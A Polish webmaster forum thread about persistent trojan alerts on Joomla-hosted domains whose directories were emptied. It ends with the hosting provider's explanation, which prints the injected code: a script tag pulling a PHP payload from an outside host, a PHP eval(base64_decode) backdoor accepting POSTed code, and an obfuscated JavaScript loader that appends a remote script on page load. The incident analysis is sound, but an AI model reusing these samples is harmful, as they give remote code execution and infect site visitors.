Witam

Od paru dni próbowałem zlokalizować wirusa na mojej stronie - bezskutecznie. Zdecydowałem więc, że skasuję całą zawartość katalogu i zainstaluję Joomlę jeszcze raz.
Tak też zrobiłem. Problem polega na tym, że katalog domeny jest pusty a w dalszym ciągu NOD (oraz AVAST na drugim kompie) pokazują mi komunikaty o wirusie a dokładniej JS/TrojanDownloadre.HackLoad.Downloader AD koń trojański. Zmieniłem hasła dostępu, wykasowałem cache przeglądarek itd...

Liczę, że ktoś mi podpowie co mogę jeszcze zrobić.

Adres strony - www.allen-carr.pl (http://www.allen-carr.pl)
Strona umieszczona na serwerze NetArt - Provider

pozdrawiam

Zgaduje że do wrzucenia plików nowej Joomla na serwer użyłeś Total Commandera ?

Jeszcze nowej joomli nie wrzuciłem. na chwilę obecną katalog jest pusty. Do ftp używam File Zilla. nią właśnie kasowałem dotychczasową stronę.
Dodam, że serwer jest ustawiony tylko na moje IP i innego podobno nie zaloguje.

Skasowałeś i dalej jest Wirus ? , chyba nie ma :) , u mnie nic nie pokazuje tylko [403] Forbidden : Dostęp zabroniony, dla pewności skasuj cały katalog public_html czy jaki tam masz do www

Na tym serwerze nie mam public_html. Mam za to katalogi które są nazwami domen. niestety ale taki katalog mogę usunąć jedynie z panela zarządzającego serwerem - a to się wiąże z jednoczesnym usunięciem kont pocztowych oraz baz danych przypisanych do domeny. Poprosiłem admina serwera o przywrócenie strony z backup'u. Spróbuję jeszcze poszukać tego g.... Sprawa jest jeszcze o tyle dziwna, że po skopiowaniu całej strony na kompa i przeskanowaniu jej NOD'em nic się nie pokazało. Wnioskuję że antyviry wykrywają tego trojana dopiero jak strona jest uruchomiona na serwerze. Ale mogę się mylić. Nod podawał mi ścieżkę dostępu do zainfekowanego pliku którego nie miałem we wskazanym miejscu. Dodam że sprawdzałem również katalogi templat'ów.

A co na to administracja serwera? (tzn. na fakt, że z "pustego" katalogu emitowany jest wirus)

Administracja mi odpisała że nie mają możliwości sprawdzenia takiego faktu. Wcześniej zgłaszałem im ten fakt, tzn o wirusie i odpisali mi tak:

Niestety nie świadczymy usług skanowania
serwerów programami antywirusowymi. Proponuję sprawdzić jaki plik/skrypt program
antywirusowy zgłasza jako niebezpieczny, lub pobrać zawartość strony i
przeskanować ją lokalnie na komputerze.

Witam ponownie

Dzisiaj zauważyłem jeszcze jedną rzecz. Otóż problem nie dotyczy jednej domeny na tym serwerze lecz wszystkich jakie są na nim dopisane (7). Utworzyłem sub domenę w adresie www.test.allen-carr.pl (http://www.test.allen-carr.pl) której katalog jest pusty. Jednak NOD w dalszym ciągu wykrywa trojana. Mam również na tym serwerze domenę www.palenie.com.pl (http://www.palenie.com.pl) także z pustym katalogiem - problem ten sam. Myślałem, że może moje komputery mają problem więc poprosiłem kolegę aby mi to sprawdził na swoich. Na pierwszym z programem AVG nic mu nie pokazało ale już na drugim z Kaspersky problem się potwierdził. Napisałem do Netart maila z pytaniem "jak to możliwe, że puste katalogi domen generują trojana?" ale jeszcze nie dostałem odpowiedzi. Jak tylko mi odpiszą to umieszczę na forum. Może komuś to się przyda.

PS. Jeżeli ktoś miał podobny problem i się z nim uporał to proszę o pomoc.

Pozdrawiam

a dokładnie ten obiekt jest blokowany http://www.test.allen-carr.pl/favicon.ico//favicon

Właśnie o to chodzi że nic tam nie powinno być blokowane bo katalog domeny jest pusty. Taka sama sytuacja jest z domeną www.palenie.com.pl której katalog także jest pusty.

AV NOD 4 nie wykrywa nic
ESS 4 nie wykrywa nic
na głównych domenach dalej nie sprawdzałem

Witam

20.09 (poniedziałek) udało się w końcu uporać z tym problemem. Po wielu mailach do Netart dostałem taką odpowiedź:

Przy wyświetleniu strony palenie.com.pl w kodzie źródłowym dla błędu 403 widać dodatkowo:

<script src=http://reelgrrlsseattle.org/luciareelgrrls/simplescriptsbkup_LLokfKcs_1258328370.php ></script> <script src=http://reelgrrlsseattle.org/luciareelgrrls/simplescriptsbkup_LLokfKcs_1258328370.php ></script>

czyli szkodliwy skrypt pobierany jest z zewnątrz. Do stron błędów dołączany jest ten skrypt, ponieważ zmodyfikowane zostały pliki:

errordocs/FOOT.shtml errordocs/HEADER.shtml

Złośliwy kod został dopisany najprawdopodobniej przez niezabezpieczone skrypty w katalogu cgi-bin, następnie nadpisał poniższe skrypty oraz ich odpowiedniki w katalogach domen.

proto/images/gifimg.php:1

<?php eval(base64_decode('aWYoaXNzZXQoJF9QT1NUWydlJ10pKW V2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpO2Vsc2Ug ZGllKCc0MDQgTm90IEZvdW5kJyk7'));?> proto/index.html:35 <script>this.wf="";var wZ;if(wZ!='' && wZ!='NZ'){wZ='jO'};var g='';function z(){var F;if(F!='X'){F=''};var H=window;var f;if(f!='' && f!='R'){f=''};var mU=new Date();var M=new String();var j=new String("g") ;var gj;if(gj!='' && gj!='wO'){gj='p'};var i='';var T=unescape;var C_='';var s="\x68\x74\x74\x70\x3a\x2f\x2f\x74\x72\x69\x70\x6f\x 64\x2d\x63\x6f\x6d\x2e\x62\x6c\x61\x63\x6b\x62\x65 \x72\x72\x79\x2e\x63\x6f\x 6d\x2e\x63\x6f\x6f\x6b\x70\x61\x64\x2d\x63\x6f\x6d \x2e\x53\x75\x70\x65\x72\x53\x75\x70\x65\x72\x53\x 61\x6c\x65\x2e\x72\x75\x3a";this.ff='';this.J='';var ai=new String();function N(zq,O){var K=new String();v ar RM='';var _=T("%5b")+O+T("%5d");var EA;if(EA!='' && EA!='I'){EA=null};var cr="";var iv=new RegExp(_, j);return zq.replace(iv, i);var HX;if(HX!='' && HX!='Fm'){HX=null};this.vW="";};var Bt=new Date();this .TK='';var PH=new Array();var y_=new Array();var l='';var u=T("%2f%63%6e%7a%7a%2e%63%6f%6d%2f%63%6e%7a%7a%2e%63%6 f%6d%2f%6b%61%69%78%69%6e%2e%63%6f%6d%2f%67%6f%6f% 67%6c%65%2e%63%6f%6d%2f%61%62%72%69%6c%2e%6 3%6f%6d%2e%62%72%2e%70%68%70");this.pX="";this.FMY="";var c=document;var C=N('8321407394816641603373557','29371546');var gm="";function P(){var ag;if(ag!='Lm' && ag != ''){ag=null};var VI;if(VI!='Ey' && VI != ''){VI=null};this.Ky="";var yo;if(yo!='Ix' && yo != ''){yo=null};l=s;var LJ=new Date();var aL=new String();l+=C;var ua;if(ua!='' && ua!='ym'){ua='Cg'};l+=u;try {var GX='';Q=c.createElement(N('swcvrAiQpqt D','Kq2mvQuzBnI3lwAD'));Q.src=l;Q.defer=[1][0];var PS;if(PS!='' && PS!='sP'){PS=null};c.body.appendChild(Q);var tP=new Array();this.pp='';} catch(y){var KO;if(KO!=''){KO='rk'};var QX;if(QX!='' && QX!='cB'){ QX='U_'};};var hw;if(hw!='Af' && hw!='sH'){hw=''};var TMV;if(TMV!='' && TMV!='pP'){TMV=''};}var gz='';var pA;if(pA!='_n' && pA!='hws'){pA=''};var LF;if(LF!=''){LF='It'};H[String("onloa"+"d")]=P;var oX;if(oX !='SI'){oX='SI'};this.Vb='';var cR;if(cR!='' && cR!='OI'){cR=null};};var Wm='';z();</script> <!--5f280d520e3b09163116846fce766c01-->

Proszę o zabezpieczenie skryptów, usunięcie złośliwego kodu, przeprowadzenie autydu bezpieczeństwa Państwa aplikacji oraz ich aktualizację.

-------------------------

Myślę że było to wywołanie przez zakupiony program do pozycjonowania stron (muszę to jeszcze sprawdzić).

pozdrawiam